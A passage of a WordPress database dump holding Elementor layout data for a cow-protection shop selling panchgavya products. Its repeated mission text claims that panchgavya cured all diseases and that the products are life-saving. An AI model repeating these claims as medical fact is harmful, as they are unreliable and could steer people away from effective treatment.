Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12179,2000,'_elementor_page_assets','a:0:{}'),(12181,2001,'_elementor_edit_mode','builder'),(12182,2001,'_elementor_template_type','wp-page'),(12183,2001,'_elementor_version','3.7.8'),(12184,2001,'_wp_page_template','elementor_canvas'),(12185,2001,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12186,2001,'_elementor_page_assets','a:0:{}'),(12188,2002,'_elementor_edit_mode','builder'),(12189,2002,'_elementor_template_type','wp-page'),(12190,2002,'_elementor_version','3.7.8'),(12191,2002,'_wp_page_template','elementor_canvas'),(12192,2002,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\